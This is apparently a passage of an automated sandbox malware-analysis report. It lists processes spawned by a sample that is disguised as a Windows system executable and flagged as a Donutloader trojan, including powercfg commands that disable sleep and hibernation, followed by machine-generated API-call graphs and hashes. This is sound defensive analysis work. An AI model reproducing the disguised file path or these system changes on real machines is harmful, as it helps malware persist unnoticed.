                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
                                                                                                          Imagebase:0x7ff66ccc0000
                                                                                                          File size:2'887'168 bytes
                                                                                                          MD5 hash:56EC5472231866630749CCF6977C4FBD
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.2064926837.000001677A63A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001F.00000002.2065257681.000001677A8C1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          Has exited:true

                                                                                                          Target ID:32
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:33
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:34
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:35
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:36
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:37
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:38
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:39
                                                                                                          Start time:01:37:37
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:14.4%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:6.8%
                                                                                                            Total number of Nodes:813
                                                                                                            Total number of Limit Nodes:20
HeapReAlloc 8059->8061 8062 1400122a1 8060->8062 8061->8062 8062->8050 8235 14000432e 8238 140012600 TlsGetValue 8235->8238 8237 140004333 8238->8237 7730 140011a30 InitializeCriticalSection 8063 1400136b0 8064 1400136bf 8063->8064 8065 140013750 memmove 8064->8065 8066 140014393 8064->8066 8068 14001378b 8064->8068 8065->8068 8067 140014d80 3 API calls 8066->8067 8066->8068 8067->8068 8239 140016f30 8240 140016f60 8239->8240 8240->8240 8241 140016f6b MultiByteToWideChar 8240->8241 8242 1400126d0 2 API calls 8241->8242 8243 140016f97 MultiByteToWideChar 8242->8243 7539 14000c6b0 7540 14000c6d1 7539->7540 7541 14000c6c0 RemoveVectoredExceptionHandler 7539->7541 7541->7540 7731 140007a30 7732 140007a50 9 API calls 7731->7732 7733 140007a49 7732->7733 7734 140008230 7735 140008260 12 API calls 7734->7735 7736 140008251 7735->7736 8069 140008eb5 8070 140008ee3 8069->8070 8071 140008ec9 8069->8071 8074 140008ed4 8070->8074 8085 14000afc0 8070->8085 8071->8074 8075 140009da0 8071->8075 8076 140009dc9 8075->8076 8078 140009e0d 8075->8078 8095 14000b510 8076->8095 8078->8078 8079 140009da0 _wcsicmp 8078->8079 8082 140009de0 8078->8082 8080 140009e66 8079->8080 8081 140009da0 _wcsicmp 8080->8081 8084 140009e79 8081->8084 8082->8074 8083 14000b510 _wcsicmp 8083->8084 8084->8082 8084->8083 8086 14000afe9 8085->8086 8088 14000b02d 8085->8088 8087 14000b510 _wcsicmp 8086->8087 8092 14000b000 8087->8092 8088->8088 8089 14000afc0 _wcsicmp 8088->8089 8088->8092 8090 14000b086 8089->8090 8091 14000afc0 _wcsicmp 8090->8091 8094 14000b099 8091->8094 8092->8074 8093 14000b510 _wcsicmp 8093->8094 8094->8092 8094->8093 8096 14000b524 8095->8096 8097 14000b515 8095->8097 8096->8082 8098 1400070cc _wcsicmp 8097->8098 8099 14000b51e 8097->8099 8098->8082 8098->8095 8099->8082 8244 140014535 8245 14001455a 8244->8245 8245->8245 8246 140014779 memmove 8245->8246 8247 1400145dc 8245->8247 8246->8247 7737 14000bc38 7738 14000bc84 7737->7738 7739 14000bc4c 7737->7739 7739->7738 7740 14000bc51 
SendMessageW Sleep PostMessageW 7739->7740 7740->7738 7745 14000e83b HeapAlloc 7746 14000e87d 7745->7746 7747 14000303f 7758 140012600 TlsGetValue 7747->7758 7749 140003044 7750 140012360 HeapFree 7749->7750 7751 140003058 7750->7751 7752 140012360 HeapFree 7751->7752 7753 14000306a 7752->7753 7754 140012360 HeapFree 7753->7754 7755 14000307c 7754->7755 7756 140012360 HeapFree 7755->7756 7757 14000308e 7756->7757 7758->7749 7759 14000c040 7764 140011248 EnterCriticalSection 7759->7764 7762 14000c075 7763 14000c05d CloseHandle 7763->7762 7765 14001127a LeaveCriticalSection 7764->7765 7766 14001126c 7764->7766 7767 14000c058 7765->7767 7766->7765 7767->7762 7767->7763 8100 1400048c0 8109 140012600 TlsGetValue 8100->8109 8102 1400048c5 8103 140012360 HeapFree 8102->8103 8104 1400048d9 8103->8104 8105 140012360 HeapFree 8104->8105 8106 1400048eb 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048fd 8107->8108 8109->8102 8248 14000e540 8249 140011248 2 API calls 8248->8249 8250 14000e55f 8249->8250 8251 14000b740 8254 14000b758 8251->8254 8294 14000b5d8 8254->8294 8256 14000b790 8257 14000b5d8 2 API calls 8256->8257 8258 14000b79b 8257->8258 8259 14000b5d8 2 API calls 8258->8259 8260 14000b7a6 8259->8260 8261 14000b7b2 GetStockObject 8260->8261 8262 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8260->8262 8261->8262 8263 14000be5c 3 API calls 8262->8263 8264 14000b83f 8263->8264 8265 14000bf44 7 API calls 8264->8265 8266 14000b84d 8265->8266 8267 14000b859 IsWindowEnabled 8266->8267 8268 14000b87a 8266->8268 8267->8268 8269 14000b863 EnableWindow 8267->8269 8270 14000be5c 3 API calls 8268->8270 8269->8268 8271 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8270->8271 8272 14000b902 6 API calls 8271->8272 8273 14000bb96 8271->8273 8274 14000ba12 SendMessageW wcslen wcslen SendMessageW 8272->8274 8275 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8272->8275 8276 14000bba4 8273->8276 8297 
1400127b0 TlsGetValue 8273->8297 8274->8275 8279 14000bb48 8275->8279 8277 14000bba9 HeapFree 8276->8277 8278 14000bbbb 8276->8278 8277->8278 8281 14000bbd2 8278->8281 8282 14000bbc0 HeapFree 8278->8282 8283 14000bb51 8279->8283 8284 14000bb0a GetMessageW 8279->8284 8286 14000bbd7 HeapFree 8281->8286 8287 14000b751 8281->8287 8282->8281 8288 14000bb56 DestroyAcceleratorTable 8283->8288 8289 14000bb5f 8283->8289 8284->8283 8285 14000bb20 TranslateAcceleratorW 8284->8285 8285->8279 8290 14000bb34 TranslateMessage DispatchMessageW 8285->8290 8286->8287 8288->8289 8289->8273 8291 14000bb68 wcslen 8289->8291 8290->8279 8292 1400126d0 2 API calls 8291->8292 8293 14000bb77 wcscpy HeapFree 8292->8293 8293->8273 8295 14000b5ea wcslen HeapAlloc 8294->8295 8296 14000b60e 8294->8296 8295->8296 8296->8256 8297->8276 7768 14000c444 7769 14000c455 7768->7769 7770 14000c44d SetEnvironmentVariableW 7768->7770 7770->7769 8110 14000cec4 8111 14000cf4b 8110->8111 8112 14000cee9 8110->8112 8112->8111 8114 14000cf02 8112->8114 8118 14000d140 8112->8118 8114->8111 8117 140016538 5 API calls 8114->8117 8125 14000d1f0 8114->8125 8134 14000d02c 8114->8134 8117->8114 8119 14000d15b 8118->8119 8120 14000d1b4 memset 8119->8120 8121 14000d163 HeapFree 8119->8121 8123 1400168c0 HeapFree 8119->8123 8124 1400116f4 3 API calls 8119->8124 8122 14000d1d0 8120->8122 8121->8119 8122->8114 8123->8119 8124->8119 8126 14000d230 8125->8126 8128 14000d210 8125->8128 8127 14001147c 4 API calls 8126->8127 8133 14000d22e 8127->8133 8128->8126 8129 14000d21d 8128->8129 8131 1400168c0 HeapFree 8129->8131 8129->8133 8130 14000d295 8130->8114 8131->8133 8132 14000d281 memset 8132->8130 8133->8130 8133->8132 8135 14000d073 8134->8135 8136 14000d04c 8134->8136 8140 14000d08f 8135->8140 8155 14000d3a4 8135->8155 8149 14000cf74 8136->8149 8139 14000d051 8139->8135 8141 14000d059 8139->8141 8142 14001147c 4 API calls 8140->8142 8143 14000d06e 8141->8143 8147 1400168c0 HeapFree 8141->8147 8144 14000d0a6 8142->8144 8145 
14000d11c 8143->8145 8146 14000d108 memset 8143->8146 8144->8145 8148 14000d0ae wcslen HeapAlloc wcscpy 8144->8148 8145->8114 8146->8145 8147->8143 8148->8143 8150 14000cfa2 8149->8150 8152 14000cfe2 8149->8152 8151 14000d3a4 tolower 8150->8151 8153 14000cfa7 8151->8153 8152->8153 8154 14000cff8 wcscmp 8152->8154 8153->8139 8154->8152 8154->8153 8156 14000d3c7 tolower 8155->8156 8157 14000d3b8 8156->8157 8158 14000d3d0 8156->8158 8157->8156 8158->8140 8298 140003144 8299 140003147 8298->8299 8300 140012360 HeapFree 8299->8300 8301 140003156 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003168 8302->8303 7771 140002648 7772 14000264f 7771->7772 7773 140012360 HeapFree 7772->7773 7774 140002666 7773->7774 7775 140012360 HeapFree 7774->7775 7776 140002678 7775->7776 7777 140012360 HeapFree 7776->7777 7778 14000268a 7777->7778 7779 140012360 HeapFree 7778->7779 7780 14000269c 7779->7780 7781 140012360 HeapFree 7780->7781 7782 1400026ae 7781->7782 8159 1400088c9 8160 1400088e0 8159->8160 8161 1400088fa 8159->8161 8162 140009da0 _wcsicmp 8160->8162 8164 1400088eb 8160->8164 8163 14000afc0 _wcsicmp 8161->8163 8161->8164 8162->8164 8163->8164 7783 14000b64c 7784 14000b667 7783->7784 7785 14000b70e UnregisterClassW 7783->7785 7786 14000b68b 7784->7786 7788 14000b674 DefWindowProcW 7784->7788 7789 14000b67f 7784->7789 7787 14000b72c 7785->7787 7786->7787 7790 14000b6ea EnableWindow 7786->7790 7791 14000b6fc 7786->7791 7788->7787 7789->7786 7792 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7789->7792 7790->7791 7795 14000bf44 7791->7795 7792->7786 7796 14000bf57 EnumWindows 7795->7796 7797 14000bfbb 7795->7797 7799 14000b703 DestroyWindow 7796->7799 7800 14000bf77 GetCurrentThreadId 7796->7800 7798 14000bfc7 GetCurrentThreadId 7797->7798 7797->7799 7802 14000bfdb EnableWindow 7797->7802 7804 14000bff0 SetWindowPos 7797->7804 7806 140011c68 7797->7806 7798->7797 7799->7787 7801 14000bf85 7800->7801 7801->7799 7801->7800 7803 14000bf8b 
SetWindowPos 7801->7803 7802->7797 7803->7801 7804->7797 7807 140011c74 HeapFree 7806->7807 7809 14001f820 7807->7809 8165 1400130cb 8167 1400130d0 8165->8167 8166 140014d80 3 API calls 8170 140013480 8166->8170 8168 1400132ba 8167->8168 8169 1400132aa memmove 8167->8169 8168->8166 8168->8170 8169->8168 8304 140002b4c 8305 1400123e0 21 API calls 8304->8305 8306 140002b6a 8305->8306 8389 140016fd0 8390 140017000 8389->8390 8390->8390 8391 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8390->8391 7511 14000de50 7529 1400112a8 EnterCriticalSection 7511->7529 7513 14000de98 7514 14000deb6 7513->7514 7515 14000defb 7513->7515 7523 14000e04d 7513->7523 7516 14000dec9 7514->7516 7517 14000decd CreateFileW 7514->7517 7518 14000df42 7515->7518 7519 14000df00 7515->7519 7516->7517 7525 14000dfb7 7517->7525 7522 14000df5f CreateFileW 7518->7522 7518->7525 7520 14000df13 7519->7520 7521 14000df17 CreateFileW 7519->7521 7520->7521 7521->7525 7524 14000df8d CreateFileW 7522->7524 7522->7525 7524->7525 7525->7523 7526 14000dfe1 HeapAlloc 7525->7526 7527 14000dff9 7525->7527 7526->7527 7527->7523 7528 14000e036 SetFilePointer 7527->7528 7528->7523 7530 1400112e3 7529->7530 7531 1400112d0 7529->7531 7532 140011312 7530->7532 7533 1400112e9 HeapReAlloc 7530->7533 7534 140011cb0 HeapAlloc 7531->7534 7536 14001132d HeapAlloc 7532->7536 7538 14001131d 7532->7538 7533->7532 7535 1400112de 7534->7535 7537 140011352 LeaveCriticalSection 7535->7537 7536->7538 7537->7513 7538->7537 8171 1400086d0 8172 140008701 8171->8172 8173 1400086ee 8171->8173 8174 140008710 CharLowerW CharLowerW 8172->8174 8175 14000873e 8172->8175 8174->8172 8174->8175 7810 140002853 7831 1400123e0 7810->7831 7814 14000286b 7844 1400121c0 GetLastError TlsGetValue SetLastError 7814->7844 7816 140002889 7845 140012450 7816->7845 7818 140002898 7850 1400121c0 GetLastError TlsGetValue SetLastError 7818->7850 7820 1400028a6 7851 1400121c0 GetLastError TlsGetValue SetLastError 7820->7851 7822 1400028ba 7852 
14000c8e0 7822->7852 7826 1400028d4 7857 1400125d0 TlsGetValue 7826->7857 7828 1400028e5 7858 14000b574 7828->7858 7830 1400028fb 7832 1400123ed 7831->7832 7833 14001240f TlsGetValue 7831->7833 7836 140012060 5 API calls 7832->7836 7834 140002861 7833->7834 7835 140012420 7833->7835 7843 1400121c0 GetLastError TlsGetValue SetLastError 7834->7843 7874 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7835->7874 7837 1400123f2 TlsGetValue 7836->7837 7865 140016cc4 7837->7865 7840 140012425 TlsGetValue 7842 140016cc4 13 API calls 7840->7842 7842->7834 7843->7814 7844->7816 7846 140012477 7845->7846 7847 140012469 wcslen 7845->7847 7848 1400126d0 2 API calls 7846->7848 7847->7846 7849 140012485 7848->7849 7849->7818 7850->7820 7851->7822 7853 14000c8f0 7852->7853 7854 1400126d0 2 API calls 7853->7854 7855 1400028ca 7854->7855 7856 140012520 TlsGetValue 7855->7856 7856->7826 7857->7828 7875 14000be5c GetForegroundWindow 7858->7875 7861 14000bf44 7 API calls 7862 14000b5a3 MessageBoxW 7861->7862 7863 14000bf44 7 API calls 7862->7863 7864 14000b5bf 7863->7864 7864->7830 7866 140016cf2 TlsAlloc InitializeCriticalSection 7865->7866 7867 140016d11 TlsGetValue 7865->7867 7866->7867 7868 140016de6 HeapAlloc 7867->7868 7869 140016d29 HeapAlloc 7867->7869 7870 14001240d 7868->7870 7869->7870 7871 140016d49 EnterCriticalSection 7869->7871 7870->7834 7872 140016d61 7 API calls 7871->7872 7873 140016d5e 7871->7873 7872->7868 7873->7872 7874->7840 7876 14000b596 7875->7876 7877 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7875->7877 7876->7861 7877->7876 8392 1400031d9 8393 1400031dc 8392->8393 8394 140012360 HeapFree 8393->8394 8395 1400031eb 8394->8395 8396 14000c3dc GetEnvironmentVariableW 8397 14000c408 8396->8397 8398 1400126d0 2 API calls 8397->8398 8399 14000c413 GetEnvironmentVariableW 8398->8399 8176 1400076e0 8177 14000773d 8176->8177 8179 1400076f1 8176->8179 8178 140007729 wcsstr 8178->8177 8179->8177 8179->8178 8313 140007760 8314 1400077e7 8313->8314 8315 140007769 
8313->8315 8315->8314 8316 1400077b9 8315->8316 8317 1400077c0 wcsstr 8315->8317 8320 1400085f0 8316->8320 8319 1400077be 8317->8319 8321 14000869f 8320->8321 8322 140008617 CharLowerW 8320->8322 8321->8319 8323 140008630 8322->8323 8323->8321 8323->8323 8324 14000864c CharLowerW 8323->8324 8325 140008670 CharLowerW CharLowerW 8323->8325 8324->8323 8325->8323

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_140000000_file.jbxd
Similarity
• API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
• String ID: GetLongPathNameW$Kernel32.DLL
• API String ID: 820969696-2943376620
• Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
• Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
• Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
• Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340

Control-flow Graph

Similarity
• API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
• String ID:
• API String ID: 4232179356-0
• Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
• Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
• Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
• Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10

Control-flow Graph

Similarity
• API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
• String ID:
• API String ID: 2685021396-0
• Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
• Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
• Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
• Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2499486723-0
                                                                                                            • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                                                                            • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                                                                            • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                                                                            • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointermemmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 2366752189-0
                                                                                                            • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                                                                            • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                                                                            • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                                                                            • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                                                              • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                                                              • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                                                              • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                                                              • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                                                              • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                                                              • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                                                                                              • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                                                              • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                                                              • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                                                              • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                                                              • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                                                              • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                                                              • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                                                              • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                                                              • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                                                              • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                                                              • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                                                              • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                                                              • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                                                              • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                                                              • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                                                              • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                                                              • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                                                              • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                                                              • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                                                                            • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                                                                            • ExitProcess.KERNEL32 ref: 0000000140001258
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949789300.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949841545.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_140000000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                                                                            • String ID: 0V
                                                                                                            • API String ID: 1207063833-2748129481
                                                                                                            • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                                                                            • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                                                                            • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                                                                            • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1948364795.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1948211369.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1949265802.0000000140018000.00000002.00000001.01000000.00000003.sdmp
